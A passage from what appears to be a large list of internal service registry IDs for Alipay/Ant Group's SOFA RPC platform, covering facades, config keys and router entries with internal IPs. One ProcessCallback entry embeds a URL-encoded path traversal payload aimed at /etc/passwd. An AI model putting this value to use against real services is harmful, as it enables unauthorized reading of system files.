_ID#@#SOFA","com.alipay.abnclprod.facade.taskflow.api.AbnTaskRuleConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.charityasset.common.service.facade.api.CompositeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.igfas.facade.api.UnifiedMsgAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.rule.TraditionRuleManageService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ifxblade_tech_processCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:publicDomain_antdsr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.common.facade.InsMktOpenTaskFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.maxCampAccessAmt,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.assistinvestigate.freezetask.facade.FreezeTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antemc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.activity.sign.SignConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundAppointmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_smartcall_smartcallInfoInputFrontService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:etenSip_ProcessCallBackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@ecmcore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-greatyouthtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:PCREDITDMP_ARGO@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.mrch.MrchArOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_FINCOM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yuyan.deploy.GrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifprocess:name=com.alipay.cifprocess.drm.CIFINAgentSwitcher.maxSize,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.risk.api.RiskProcessPolicyService:1.0:uctlite@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemsgprod.common.service.facade.template.MsgTemplateLibQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.manage.facade.api.DivideBatchManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.licenseagreements.api.LicenseAgreementsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcustcore.common.service.facade.api.VerifyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aeicore.common.service.facade.BalAgrManagementFacade:1.0:balAgrManagementFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudprod.facade.riskcheck.OpscldRiskDefenseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mmtcaftscv@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:adtask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.MstTinyAppPageInfoDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.69.243.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.databizcore.common.service.facade.security.AddressSecurityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.1.221#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finorm.core.service.dispatch.cluster.DispatchPolicyCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.opinioncore.emcooperateZdalDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.unifygw.facade.service.UnifygwCustomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricemng.common.service.facade.api.audit.PricemngProcessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securityjs:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.232.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dsoc.service.facade.api.server.config.ServerConfigService:1.0:offline_stable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.flowarrange.OstsFlowArrangeCoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.common.service.facade.VerificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.FixedFundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterInternationalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.ProdQuestionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwealthprod.common.service.facade.YouthOpenAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.enterprise.facade.EntOperatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.recruit2.RecruitCmpPlanQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creditcore.service.facade.contract.api.user.CreditUserQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.weiboPropagationLevelLow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.ryb.RYBActivityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.zmodel.core.evaluator.config.ZModelFeatureCopyConfigResource.modelFeatureCopyRatioConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finorm.biz.facade.api.YidaApprovalInstanceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linepay.common.serivce.facade.mng.merchant.InstMerchantService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.sample.VcpSampleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.merchant.api.MerchantBizBelongService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.fundTradeSubscribeInstsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.astaralarm.common.service.facade.tvm.VulCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.facade.PromoFundLosePlatformInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.trade.TradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.config.drm.DrmAccountNoAndSubCodeSlaResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.clerktone.facade.api.gray.ClerktoneGrayServiceGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexprodCurrencyWService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.mif.common.service.facade.tag.MerchantTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.metadata.common.service.tr.meta.MetaDatabaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.fc.common.lang.drm.AntBizLogCfgDrm.hourLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ireserve@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_BKCLOUDFUNDS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acprovisioncore.common.facade.resource.facade.database.DatabaseFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:trafficcardsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.CompanyExecutiveHoldingFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-pcreditsffbackuptwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.limit.PaymentmngUnifiedLimitCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.rest.AntcodeCallbackFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cicada.common.service.facade.api.AppConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwdssp.service.UploadFileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:DASSET@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:i18n@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplaycenter.common.service.facade.api.RelationRecordOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lowercaseFirst:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeLoggers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.247.164#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.core.service.fop.processor.TaskProcessorManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdSceneMngService:1.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetinsight.common.service.facade.api.FundPerformanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.facade.BbcMeasureDataFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icfmng.common.service.facade.api.RemitApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.withdraw.api.RetransmitWithdrawService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.sdk.change.api.OpscloudQueryService:1.0:hnbc_plus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.edeductcenter.common.service.facade.EdeductSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antiep.common.service.facade.AntiepGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.97.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.acctrans.core.config.drm.DrmFundFlowWhiteConfigInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofabootserver.facade.SofabootRpcServerSpFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.alipaypoint.api.AlipayPttransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:kbservcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mappprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.reloadRules,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.112.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openinsight.common.service.facade.hyp.OpeninsightCacheHypQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rpc.foo.common.service.facade.PressureService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.accenter.service.query.api.AccenterTallyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icbcenter.service.facade.api.ChargebackJudgeVostroService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payflux.spi.BizDispatchServiceFacade:1.0:mobilecashier_ccmc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.antha.activity.ActivityHaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.VipTransferDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbminiapp.common.service.facade.tr.release.AppReleaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_ACCOUNTINGTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securitydata.common.service.facade.dataset.DataPointService:1.0:@securityservice.uuid@@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.BusinessEventService:1.0:businessEventService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.xviewcore:name=com.alipay.xview.core.common.drm.CacheConsistSwitch.rateOfRead,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.DCFileSplitSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.gfcenter.common.service.facade.ApBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airquery.AirqueryRequestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.service.facade.api.MerchantMessageManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.service.VerifyCacheFailoverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rating.service.facade.charge.ChargeConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fpdecision.platform.common.service.facade.iface.RiskAxelDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unifygw.facade.service.UnifygwCustomFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necbill.common.service.guaranty.CompensateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.holoxlib.common.shared.facade.spi.InternalRemoteHoloxCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acxbosscore.common.service.facade.AccountServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.30.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.metadata.common.service.tr.venus.VenusService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_R_UIF#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_M_KBSERV_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditamount.service.PcreditAmountManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.244.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fin.pdcore.common.service.facade.adapter.FinProductStatisticQueryFacade:1.0:finpdcorewealth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.TaskStrategyActionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_UIF#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:infosectask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custrelationCzoneTairCache_dest.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscenemng.common.service.facade.api.TenantMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mitemcenter.common.service.facade.backend.api.nearproxy.PriceQueryClientServiceProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyserver.common.service.facade.api.BindCodeExpandJobFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.merchant.common.service.facade.SwitchCoreQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:fporgassetkeeper@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.160.177.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_ats_healthFrontService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.applet.MerchantProdProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.thirdparty.ThirdPartyManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.GiftSubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipHvpsResource.resendSumMsg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.tradeapcore.common.service.integration.drm.resource.DrmForCommonManageResource.escapeSettleCenter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.necquery.common.service.drawndn.DrawndnInfoBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ccdc.common.service.facade.CardInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.ipay.imif.iasset.common.service.facade.api.IassetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.core.service.clientquote.QuoteCompensationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:mif_mid_org_sync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.bis.FaceProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:kbticketcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:psbp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.34.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_KBASSET#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finloancenter.common.service.facade.FinancingDisclosurePermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zdatafront.common.service.facade.commonquery.CommonQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bkmerchantprod.common.service.facade.MerchActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.shared.component.asynexecutor.manager.AsynExecutorBSFacade:1.0:bkinstportal-asynExecutorBSFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acwareslifecore.common.service.facade.inner.SystemReservedFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbmemberprod.common.service.facade.api.tr.integral.UserIntegralTrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.ResVersionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.125.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.Arch:name=com.alipay.xts.ldc.pcardsales.changeMode,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.151.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.queryDivideInfoConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:gfacceptance@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_GIFT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.custview.antg.facade.accesstoken.AgATKAccessTokenViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.reservecenter.facade.api.AllocateOrderIdempotentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.NetworkDeviceQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.habaseline.common.facade.service.drill.DrillServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.merchant.facade.api.BusinessAreaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedContract2NewSyncDrmImpl.contractToNewSyncLoadNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iliquidity.biz.manager.forecast.BankCashForecastAdjustmentManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecLabelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-24#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antgroup.zmxy.zmcustprod.common.service.facade.api.UserProfileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.platform.AppAdManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:zmngglobal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.accha.core.drm.FailoverSwitchDrmResource.shareStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:tradeexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ialicore.irouteclient.elastic.api.ElasticService:1.0:imemberprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.ebpp.EbppInputFieldServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchprod_merchantInfoEditProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintranscore.common.service.facade.trans.FinRedeemFacade:1.0:fundtranscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataCollectWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.72.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkcloudfunds.service.facade.depository.api.ArrangementAdjustFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.ukey.facade.InitPasswordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.parentchildmodel.api.PcmtransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.OperatorTreeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.community.api.reward.RewardManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.dataocean_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkloansupport.common.service.facade.collection.msg.CollMsgResultServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.globalsite.facade.api.operation.MerchantTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.service.facade.tmallpcard.api.TmallPCardtransTransVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:loginxiaowei@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:aliminiabilityprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.bran